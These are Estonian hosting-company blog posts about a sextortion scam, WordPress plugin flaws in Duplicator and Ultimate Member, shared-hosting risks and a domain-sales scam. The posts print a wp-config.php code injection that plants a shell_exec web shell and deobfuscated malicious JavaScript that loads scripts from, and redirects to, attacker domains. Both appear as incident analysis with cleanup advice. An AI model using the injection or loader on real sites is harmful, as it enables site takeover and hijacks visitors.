Kas sekspressimine e. sextortion kellegi peal töötab kah?

Oktoober on Euroopa küberturvalisuse kuu ja seetõttu on paslik hetk ette võtta selline populaarne küberkuritegevuse liik nagu sextortion.

See on väljapressimine, milles kasutatakse mõnest igati ontlikust veebist lekkinud e-postiaadressi ja parooli kombinatsiooni koos väitega, et sinu kontole on neid teades sisse murtud ning varsti saavad kõik teada, milliseid saite sa külastad ja mida sealt vaatad.

Sa ju ei kasuta mitmes veebisaidis sama parooli? Või vähemalt on täiesti kindel, et peamiste sotsmeedia-kontode ja eposti-teenuse paroolid on unikaalsed? Kui ei, siis vaheta need kohe ära, võimalusel lisa kahetasemeline tuvastus (2-factor authentication) … ja siis loe edasi, millisest riskist ennast just vabastasid.

Mina sain paar päeva tagasi sellise kirja, kus nii kirja adressaadina kui ka sisus on näha üks minu poolt mitteolulistes veebides kasutaja registreerimiseks kasutatav parool mille alguses “k” ja lõpus “2”*:

Ehk siis mulle kirjutab keegi rahvusvahelise häkkerirühmituse liige ning nagu ma juba aru peaks saama, on nad mu pets@tehnokratt.net kontole sisse häkkinud, teavad parooli ja saavad sealt ka kirju saata. Lisaks olla nende valduses minu sotsmeediakontod ning sõnumirakendused.

Aga see pole veel kõik – nad olevat ligi pääsenud ka minu arvutile ja selle veebikaamerale ning mind on tabatud n-ö in flagranti ja neil on olemas samaaegsed videosalvestused minust ja sellest, mida ma vaatasin.

Piinliku juhtumi võiks aga unustada, kui ma kannaks neile 700$ väärtuses Bitcoini etteantud aadressile.

Kas keegi selle triki õnge läheb?

Raske öelda. Mina olen kirja saanud 28. septembril kell 10:52:45 Zulu ehk Greenwichi aja järgi. Kui vaadata kirjas viidatud Bitcoini-rahakoti käivet, siis on see selline:

Tunnike pärast minule saabunud kirja on hakanud pihta laekumised, 0.1 BTC on tolle hetke kursiga umbes 700$ ehk sama mida minult küsiti. Erinevate summade küsimine sõltuvalt juhusest või tippdomeenist on selle skeemi puhul tavapärane, küllap väljapressijad jälgivad turu käitumist ja otsustavad, kas tõhusam on saada väiksemalt hulgalt ohvritelt 700$ või suuremalt 350$.

Ei saa loomulikult välistada, et raha tilgutamine on kampaania osa ning peabki jätma mulje, et häkkerigrupeeringul läheb hästi.

Kui sul on kogemust BTC-ülekannete analüüsiga, siis võin jagada aadressi ja kuulaks huviga – antud puhul leiab laekumisi nii mitmetuhande kasutuskorraga wallet’itest kui ka sellistest, kuhu on tulnud 2 BTC, millest on makstud 0.1 BTC “selle kontole” ja 1.9 kontole, millelt on omakorda makstud 0.1 ja 1.8 edasi…

Kuidas sekspressimine töötab?

Tõepoolest, kirja saatjaks oleks justnagu mina ise… aga see tuleb Korea IP-aadressilt mida tehnokratt.net SPF-kirje teps mitte lubatuks ei pea:

Koos kõigi muude probleemidega annab Zone spämmitõrje kirjale 27 punkti, tegemist on selge spämmiga mis saab külge märke või läheb spämmikausta. Paraku on kirja saatja-aadressi võltsimine äraütlemata lihtne – ja sama lihtne on huvilisel leida interneti tumedamalt poolelt lekkinud kasutaja-andmete baase, kus kirjas e-postiaadressid ja avatekstina talletatud paroolid.

Näiteks üks mõne-aasta-tagune juhtum, eeldatavasti on kõik selle veebi kasutajad saanud teavituse ning hoolsalt oma paroolid nii seal kui teistes kohtades ära muutnud:

Udustamine on siinkohal pigem uudishimu tekitaja – googeldades nähaolevaid paroole leiad hetkega nii selle kui mitmed muud Eestit puudutavad paroolitõmmised.

Ehk siis võetakse üks selline nimekiri ning saadetakse kõigile e-postidele nende parool koos ülaloleva kirjaga ja jäädakse raha ootama.

… ja küberturvakuu?

Nagu alguses mainitud, on oktoober Euroopas küberturvalisuse kuuks kuulutatud, sellega seotud Eestis toimuvad sündmused leiab ECSM veebist – ning Riigi Infosüsteemi Ameti eestvedadmisel toimub 15.10.2018 talgupäev.

Mina ei ole veel välja mõelnud, kuhu loengut pidama minna, aaaga… Kange kiusatus on võtta suur televiisor ja teha midagi huvitavat mõne ostukeskuse ava-alas. Nagu näiteks jagada tasuta wifit ja näidata ekraanil seda, kui pealtvaadatav see võrk tegelikult on.


* korduva parooli kasutamine “mitteolulistes veebides” ei pruugi siiski olla parim turvapraktika, sest on võimalik, et kusagil on mingi suva foorum, kuhu keegi saab minu e-postiga sisse logida ja spämmi postitada… Pigem võiks siis juba ka suva e-posti kasutada, nt mõnda mailinator.com pakutavat 😉

Vahel ei ole ka uuendamisest abi ehk Duplicator ja installer.php

Tuntud mantra kohaselt aitab veebirakendust turvalisena hoida sage uuendamine. Järgimist väärt soovitus, aga paraku leiab ka haavatavusi, mille puhul uuendamisest kohe üldse mitte kasu ei ole.

Duplicator – plugin, mis lubab WordPressi mugavalt kokku pakkida ja teises serveris uuesti paigaldada – on täpselt selline juhtum.

Kiire kokkuvõte: veendu, et sinu veebi juurkataloogi pole jäänud installer.php või installer-backup.php faili (näiteks tippides oma veebi-aadressi sappa: http://firmanimi.eu/installer.php). Kui on, siis korralda kohene kustutamine.
Ääremärkus: kõigil Zones majutatud lehtedel keelasime neile failidele ligipääsu, kustutamiseks on vaja eelnevalt failiõigused paika seada; juhis allpool.

Maasikaks tordi peal on sedapuhku see, et tegemist on 10+ MILJONIT korda paigaldatud pluginaga. Või õigupoolest: …see tort ainult (pahadest) maasikatest koosnebki:

  • tegemist on pluginaga, millel väidetavasti 10+ miljonit paigaldust;
  • esimesed ründed (sh Eestis) mõni nädal pärast paiga ja probleemikirjelduse avaldamist;
  • see ei ole neil esimene turvaprobleem;
  • paik kõrvaldab ühe ründeviisi, aga jätab alles teise võimaluse;
  • ükski paik ei kõrvalda Duplicatori kasutamise järel kustutamata jäänud installer.php ja installer-backup.php faile;
  • need failid võivad alles olla ka veebis, milles pluginat ennast enam ammu pole;
  • lisaks installerile võib veebis vedeleda ka andmebaas database.sql (saab kasutada nt admin-kasutaja parooli murdmiseks) ja kogu veebirakenduse arhiiv (mille nime installer.php reedab)
  • probleemi avastaja kirjeldab ründemeetodit täpsusega, mis võimaldab seda sisuliselt copy-paste meetodil kasutusele võtta (muuhulgas näeme rünnetes test.php faile);
  • tuntud veebiturvapakkuja blogipostitusest jääb mulje, et eelnevale vaatamata pole nad päris täpselt aru saanud, kuidas rünne töötab ja miks wp-config.php katki kipub minema.

Ehk siis… see maasikas on veidi “sedapsi”:

Mida Duplicator teeb?

Tegemist on WordPressi pluginaga, mis lubab olemasoleva veebi (nt veebiarendaja testserveris oleva) kokku pakkida, mille tulemuseks on üks suur arhiiv kõigi failide ja andmebaasi-sisuga ning installer.php skript.

Need saab lihtsa vaevaga uude serverisse üles laadida ning seejärel tippides veebiaadressi sappa installer.php ilma tehniliste teadmisteta seal ka lahti pakkida, vajadusel koos domeeninime muutmisega:

Paigaldamise järel jäävad aga serverisse alles nii installer, selle varukoopia kui ka arhiivist lahti pakitu:

Kuidas rünnatakse?

Kuna maha unustatud installer.php saab käivitada igaüks, siis võiks näiteks sisestada oma kontrolli all oleva andmebaasiserveri andmed ning paigalduse järel saaks seal admin-kasutaja parooli ära vahetada. Ja seejärel võib juba sobiliku tagaukse paigaldada, nt pluginana:

AGA! Duplicator kirjutab siia sisestatud andmed kenasti wp-config.php faili, misjärel on võimalik teha eriti labane koodisüst, pannes andmebaasi nimeks jupi koodi:

test');
file_put_contents("test.php", '<pre><?php if (isset($_GET["synacktiv_backdoor"])) { echo shell_exec($_GET["synacktiv_backdoor"]); } ?></pre>'); /*

Nüüd näeb wp-config.php välja selline:

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'test'); 
file_put_contents("test.php", '<pre><?php if (isset($_GET["synacktiv_backdoor"])) { echo shell_exec($_GET["synacktiv_backdoor"]); } ?></pre>'); /*');

/** MySQL database username */
define('DB_USER', 'test');

/** MySQL database password */
define('DB_PASSWORD', 'test');

/** MySQL hostname */
define('DB_HOST', 'nowhere:12345');

… ja pöördudes korra otse wp-config.php poole (minu näidise puhul https://dupdup.local/wp-config.php), tekib samasse fail test.php, mis toimib lihtsa tagauksena (näide käsuga ls , mis kuvab veebi juurkataloogi sisu):

Loomulikult on selle käigus tehtud katki ka wp-config.php ja veebikülastajad näevad andmebaasi-ühenduse veateadet:

Kuidas ennast kaitsta?

Kui oled veebiarendajana (või -omanikuna) kunagi Duplicator’it kasutanud veebi kolimiseks, siis leia see aeg, et kõik varasemad projektid üle kontrollida ja eemalda veebi juurkataloogi jäänud installer.php, installer-backup.php, database.sql ja arhiivifail.

Kontrollimine on lihtne ja selleks pole isegi vaja FTP-ligipääsu: pannes falinime oma veebiaadressi sappa (nt: http://firmanimi.eu/installer.php), peaks kuvatama Error 404 ehk “lehte ei leitud” teadet. Kui avaneb ülal näha olev Duplicator’i dialoog, siis on väga pahasti.

Paha ei tee ka veidi põhjalikum veebiserveris ringivaatamine, sest sageli vedeleb seal kataloogides /vana või /new veebilehe erinevaid (paikamata ja kohati ka nõrga adminparooliga) versioone, näiteks test.php, mis kuvab serveri-infot jpm tarbetut kola, mis võib kellegi jaoks osutuda väärt turvaprobleemiks.

Zone kliendid on kaitstud

Zones majutatud veebidele lasid meie adminnid peale roboti, mis keelas kõigi Duplicator’i installer*.php failide lugemise (chmod 0x000), sest kliendi faile me ära kustutada ei tahaks. Kui probleemsed failid sinu veebis olemas, siis näed meil sellist veateadet:

… ja failide kustutamiseks pead FTP-programmis paremklõpsama failinimel ning andma kasutajale Read ja Write õigused:

 

Mitu veebi samas virtuaalserveris – miks mitte?

Üsna tihti kohtab soovi majutada ühe virtuaalserveri alla mitu veebi – see on “väikese nipiga” tehtav, aga me oleme rõhutatult hoidunud selle lihtsamaks tegemisest. Põhjuseks turvalisus ja väiksemal määral ka jõudlus.

Nüüd sattus kätte ka hea/halb näide, seoses Ultimate Member plugina haavatavusega. Sündmuste ahel oli üldistatult järgmine:

  • alamdomeenil asuv veeb (failid kataloogis[alamveeb-1]) kasutas Ultimate Member pluginat, selle turvaaugu kaudu võeti veeb 11. augustil ründaja poolt üle ning see hakkas külastajaid edasi suunama;
  • järgnevatel päevadel on näha erinevate failide muutmist, tegemist võib olla nii sama ründaja koodiuuendustega kui konkureerivate ründajatega;
  • 22. augustil on jõutud nakatava koodiga versioonini, mis oskab laiemalt ringi vaadata ning varustas pahavaraga põhidomeeni ja 3 alamdomeeni, kokku 541 faili (PHP ja JavaScript, lisaks said pihta ka sobiva nimega CSSid).

Selles ajaloos on [alamveeb-1] Ultimate Members pluginaga veebileht, htdocs/ asub põhiveeb ja esimene “roosa rida” asub sootuks väljaspool veebiserverite juurkatalooge:

Olgu lisatud, et punane rida ehk [alamveeb-3] on Joomla! ehk selline JavaScript’ide nakatamine töötab väga hästi sisuhaldusrakendusest hoolimata. Sellest, mida neis failides muudeti, saad lugeda postitusest Kolme päevaga turvapaigast rünneteni: Ultimate Member.

Miks nii läks?

Virtuaalserver on tehnilises mõttes üks Linux’i kasutajakonto, millel on oma kodukataloog ja selle all veeb või veebid. Kasutajal on mõistagi õigus kõiki oma faile lugeda ja kirjutada, näiteks FTPga sisse logides. Ka veebiserver käitab PHP-koodi sellesama kasutaja õigustes… ehk sisuliselt “näeb” ja saab muuta kõike seda, mida kasutaja ise.

Vahest on olukorda lihtsam mõista Windowsi kasutaja kodukataloogi näitel:

Jah, otseloomulikult näeb sinu WordPress ka kõiki muid faile, mille oled serverisse laadinud. Paljude veebimajutus-teenuse pakkujate puhul asuvad samas kasutaja kodukataloogis ka kõigi e-posti-kontode postkastid ning sissetungija saab hõlpsalt kirju lugeda, sh leida sinna saadetud teiste teenuste paroole. Meil Zones on e-post täiesti eraldi serverites, seda nii turvalisuse kui käideldavuse huvides.

Sellist kõrval-veebide ülevõtmist nimetatakse külgliikumiseks (lateral movement) ja see on mistahes ründe puhul standardtegevus: said küüned kuhugi taha? Vaata veidi ringi, tõenäoliselt on omanik midagi vedelema jätnud ning sul õnnestub sellest ühest süsteemist järgmisse edasi liikuda. Virtuaalserverist mitme veebi leidmine annab kindlasti põhjust vaimustunult “Bingo!” hõigata.

Kuidas vältida?

Valides Virtuaalserverit on sul mõttes hind, kettaruum ja muud numbrilised parameetrid. Tegelikult ostad sa aga eraldatust – tükikest serverist, kuhu teised ligi ei pääse ja mis tagab ka selle, et õnnestunud ründe puhul piirduvad probleemid selle ühe veebiga.

Näiteks kasutatud juhtumi puhul sai enamuse veebidest õnneks varukoopiast taastada, aga [alamveeb-1] nakatumisest oli möödas juba rohkem kui 14 päeva ning see tuli puhastada käsitsi.

Kuna ründemeetod oli tuttav, läks seegi üsna libedalt, pikemalt “mädanenud” veebi puhul (millest on sageli üle käinud mitu ründajat) ütleksin ma hinnaks minimaalselt 2, aga tõenäoliselt 4-8 tundi – ja seda ühe (alam)veebi kohta.

Alamveeb on OK näiteks test- või arendus-versiooni jaoks – eeldusel, et see on kenasti parooliga kaitstud ning poolik või uuendamata kood täiendavaks turvaprobleemiks ei osutu.

Paraku näen ma aga sageli seda, et sama konto all on avalik veebisait (uuendamata), veebi vana versioon (“igaks juhuks”), intranet, kliendihaldus, mingi kontakte koguv kampaanialahendus jms. Ehk siis konfidentsiaalne äri-info ning isikuandmed – ning hetkel, kui veeb on “maha häkitud”, võib isikuandmete kaitse üldmäärusest (GDPR) lähtuvalt tekkida vajadus teavitada intsidendist Andmekaitseinspektsiooni … ja kliente.

Üks väike märkus veel – Virtuaalserverite puhul on lisaks kettamahule seatud piirid ka samaaegsete päringute arvule, kui mõni kontol olevatest veebidest osutub aeglaseks ning otsimootorid seda hoogsalt indekseerima asuvad… kannatavad tema pärast ka teised.

ps. Ah et kuidas saab ühes Zone Virtuaalserveris mitut veebi pidada? Teed alamdomeeni ning tellid sellele vajaliku domeeni jaoks aliase 🙂 Aga ära unusta enne riske hinnata.

Ettevaatust! Vana pettus uues kuues

Euroopa Liidu tippdomeeni registrit pidav EURid hoiatab eksitavaid kauplemisvõtteid kasutavate agressiivsete petturite eest, kes üritavad rahvuslikes tippdomeenides (nagu .EE) domeene omavatele isikutele kaubamärgi kaitsmise kattevarjus peale suruda EU-lõpulisi domeene.

Petturite skeem on lihtsakoeline ja meile jõudnud ilmselt Aasiast, kus seda praktiseeritud juba väga pikka aega. Lühidalt kokkuvõttes näeb see välja järgmine:

Ühel päeval saab ettevõtja, kes omab näiteks domeeni MILJONIVAADE.EE ootamatult kirja, milles end kaubamärkide ja intellektuaalse omandi kaitse spetsialistina tutvustav isik annab teada, et tema poole on pöördutud MILJONIVAADE.EU nimelise domeeni registreerimise sooviga, aga “heatahtlik” spetsialist on otsustanud esmalt pöörduda MILJONIVAADE.EE omaniku poole, et pakkuda hoopiski tollele võimalust .EU nimi mõistliku hinna eest endale saada. “Spetsialist” rõhutab, et aega selleks on aga vähe. Reaalsus on loomulikult see, et mingit tegelikku MILJONIVAADE.EU huvilist ei ole ja ka “mõistlik hind” ei pruugi kuigi soodne olla.

Tegemist on klassikalise ebaausa kauplemisvõttega, millesarnaste kirjeldusi leiab mitmeid näiteks meie Tarbijakaitse kodulehelt https://www.tarbijakaitseamet.ee/et/tarbijale/ebaausad-kauplemisvotted.

Mida on oluline aga tähele panna on see, et kuna pakkumine tehakse reeglina ettevõttele, siis Tarbijakaitse siinjuhul pärast enam tehingust taganeda ei aita. Sellegipoolest soovitab EURid sellise pettuse ohvritel teavitada sellest oma riigi ametivõime.

Loomulikult soovitab EURid kasutada domeenide registreerimiseks usaldusväärseid akrediteeritud registripidajaid, kelle hulka kuulub ka Zone.

P.S. Seda postitust üle lugedes tekkis tunne, et oleksin sellest nagu varem kirjutanud ning etskae – pea täpselt kümme aastat tagasi kirjutasin siinsamas hoiatuse Soome kohta, kus siis seda skeemi prooviti: https://blog.zone.ee/2008/04/07/rehepaplusest-domeeninimede-abil/ ja veelkord etskae – toona on teemat kommenteerinud keegi Peeter Marvet, kellest tänaseks on saanud meie blogi üks peamiseid kirjatsurasid! 🙂

Kolme päevaga turvapaigast rünneteni: Ultimate Member

Veebirakenduste ja nende pluginate-teemade turvapaikamisega tuleb tegeleda sagedamini kui kord kuus või nädalas, sest parandusega versiooni avaldamise järel on õnneotsijad mõne päevaga platsis.

Enne kui lugema hakkad – kui sinu WordPress kasutab Ultimate Member plugina versiooni, mis on vanem kui 2.0.23, siis palun uuenda see jooksuga ära!
09.08.2018 paigatud turvaprobleemi ärakasutamine on käimas ning esimesed meile silma hakanud veebid said pihta 12.08.2018 öösel (mujal on nähtud ründeid ka enne paikamist). Seejärel uuri postituse lõpust kuidas tagada, et pluginad edaspidi ise uueneksid.

Seekordne näide jõudis meieni ühest veel nädal tagasi igati turvalisena tundunud veebist, mis üleöö hakkas külastajaid sellisele veebilehele suunama:

Vaadates failide muutmise aegu, hakkab silma üks öine komplekt:

Nagu näha, siis on tehtud muudatused kõigi teemade päistele viitavates failides… Ning enne seda on justnagu ultimatemember alla midagi üles laetud. Ja see midagi – on .php fail, lisaks mingi t. Vääääga põnev!

Vaadates sama kellaaega veebiserveri logifailis, avaneb järgnev pilt (IP on tõenäoliselt kompromiteeritud server OVH farmis):

Süvenemata detailidesse võib oletada, et POSTis olevad parameetrid koostöös referreriga site.com/wp-admin/admin-ajax.php (lisapunktid site.com eest, pole vaja ründe näidiskoodi sudima hakata!) annavad kasutajapildi postitamiseks vajaliku ühekordse liisu ehk nonssi (nonce) ning siis saadetakse /um-api/route/um!core!Files/ajax_image_upload kaudu üles “pildilaadne toode”, täpsemalt .php laiendiga GIF (häälda korrektselt!), mille sees on PHP kood:

GIF ise on väga nunnu, aga nagu näha, siis laeb Pastebin’ist alla sisu, millest saab t fail – see aga tegeleb *head*-nimeliste failide otsimisega ning lisab neisse lingi pahatahtlikule JS failile (olgu öeldud, et lisaks shell_exec versioonile on allpool sama realiseeritud ka puhtalt PHPs, juhuks kui esimene variant ei õnnestu):

Täiendus 24.08.2018 – lisaks src.eeduelements[.]com on nüüd kasutusel ka cdn.allyouwant[.]online domeen (viidatud Sucuri postituses, tuvastasime ka juba 2 ülevõetud saidi).

Aga ka see pole veel kõik – koodijupp läheb ka /wp-includes/js/jquery/jquery.js algusesse, juhuks kui keegi peaks teema ära puhastama:

Ääremärkus: kui sul on nt mõne cache-plugina poolt seatud javascriptide puhverdamine brauseris (tavapärane SEO-soovitus), siis kuvatakse häkitud saiti külastanutele vana versiooni veel pikka aega. Lihtne nipp on paigaldada ja aktiveerida Zone Cachebuster plugin, mille just tekitasin: see asendab JS ja CSS failide versiooni-parameetri räsiga, mis kasutab wp-config.php‘s olevat soola (ning soolad tasuks pärast ründekahtlust nii ehk naa ära vahetada).

See eeduelements’i jquery.js ei ole aga teps mitte see, mida nime järgi võiks oletada. Pärast väikest de-obfuskeerimist avaneb meile selline pilt ja näeme ära ka URLi, kust saab teada “reklaamitava” sihtmärgi:

function httpGet(url) {
  var $httpBackend = new XMLHttpRequest;
  $httpBackend.open("GET", url, false);
  $httpBackend.send(null);
  return $httpBackend["responseText"];
}
var curdomain = "https[:]//src.eeduelements[.]com/get.php";
var newlink = httpGet(curdomain);
if (newlink != "null") {
  (function() {
    var artistTrack = document.createElement("script");
    artistTrack.type = "text/javascript";
    artistTrack.async = true;
    artistTrack.src = newlink;
    document.head.appendChild(artistTrack);
  })();
};

Kas me võiks juba sihile jõuda, palun? OK-OK, paneme kaheksaks tunniks küpsise ja saadame külastaja parematele jahimaadele (kus ta saab praktiseerida uluk-, mitte jahimees-olemist):

if (/(^|;)\s*simtel=/.test(document.cookie)) {
} else {
  document.cookie = "simtel=1; max-age=" + 60 * 60 * 8;
  var t1 = "http[:]//murieh[.]space/?h=930130016_dc950a456f7_100&h_l=&h_5=sub_id_2&h_2=def_sub";
  document.location.href = t1;
  window.location.href = t1;
};

Kuidas puhastada?

Kui tegemist on täpselt sama ründega, siis:

  • uuenda Ultimate Member plugin;
  • kustuta /wp-content/uploads/ultimatemember/temp kataloogi sisu (NB: lisatud 16.08.2018, tx Henri tähelepanu juhtimast!)
  • kustuta tarbetud teemad;
  • kasutusel oleva teema alt otsi muudetud *head*-nimelisi faile, eemalda sinna lisatud võõra skripti link;
  • korista /wp-includes/js/jquery/jquery.js algusesse lisatud jupp, nt asendades selle puhtast WP paigaldusest võetuga;
  • kui sul on (nt .htaccess abil) lisatud Expiry päised (nt: ExpiresByType text/javascript "access plus 1 month"), siis lisa ja aktiveeri Zone Cachebuster;
  • kui sul on kasutusel mõni cache-plugin , siis tühjenda cache;
  • pärast rünnet alati: uued WP soolad, andmebaasiparooli vahetus, vaata üle kasutajabaas (eemalda kahtlased), vaheta admin-kasutajate paroolid.

Loomulikult võib nii selle kui ka teiste rünnete puhul kirjutada ka info@zone.ee ja meie tehnikutelt puhastamise tellida. Kui tegemist on teadaoleva skeemiga, siis on meil teada ka efektiivne puhastusviis. Kui on uus rünne, siis saame oma kollektsiooni uue näite ning saame teisi potentsiaalseid ohvreid ette hoiatada.

Kuidas tagada, et pluginad (ja WP) alati uuendatud saaksid?

Ülalkirjeldatud probleemi põhjustas plugin, mis oli alla ühe nädala uuendamata. Kurjategijad peavad aga uuendustel silma peal ning selgitavad turvapaiga avaldamist märgates kiiresti välja lapitud augu ärakasutamise viisi ning annavad kõikide teadaolevate WP-saitide pihta tuld: kõigepealt skann “kas plugin on olemas?” ning kui sellele on vastuseks “jah”, siis toimub automaatne sissemurdmine ja sait pannakse tegema “mida vaja”.

Mina seadistan oma WordPressid automaatselt uuendama nii WPd ennast (sh major versioone – vaikimisi paigaldatakse ainult väiksemad ehk minor uuendused) kui ka pluginaid, pannes paar rida koodi teema functions.php faili või kasutan mikropluginat Zone Updateall. Huviline leiab ametlikust pluginateegist otsinguga update ka hulga fääntsimaid lahendusi

Tasuliste pluginate-teemade puhul on enamasti vaja hoolitseda litsentsinumbri sisestamise eest… Või siis nõuab uuendamine mitte-standardset protsessi või vastavat lisapluginat.